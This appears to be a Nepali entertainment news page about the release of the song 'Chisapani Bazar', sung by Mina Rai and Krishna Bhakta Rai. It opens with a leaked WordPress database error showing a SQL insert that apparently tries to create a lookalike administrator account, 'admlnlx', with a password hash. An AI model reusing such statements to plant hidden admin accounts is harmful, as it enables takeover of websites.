WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDfz22u5FBoVuGY3FTo8luiXvQegy/1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 05:23:12', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । गायिका मिना राई र कृष्णभक्त राईको “चिसापानी बजार” बोलको गीत डिजिटल बजारमा सार्वजनिक गरिएको छ ।
मिना राई र कृष्णभक्त राईको स्वरमा रहेको गीतको भिडियो दुर्गा बान्तवा राई अफिसियल युटुबमार्फत सार्वजनिक गरिएको हो ।
दुर्गा बान्तवा राईको शब्द, निकेश राईको सगीत र कृष्ण भक्त राईको सगीत सम्योजन रहेको गीतको भिडियोमा दुर्गा बान्तवा राईको निर्देशन, मनोज राईको छायाँकन र सम्पादन रहेको छ ।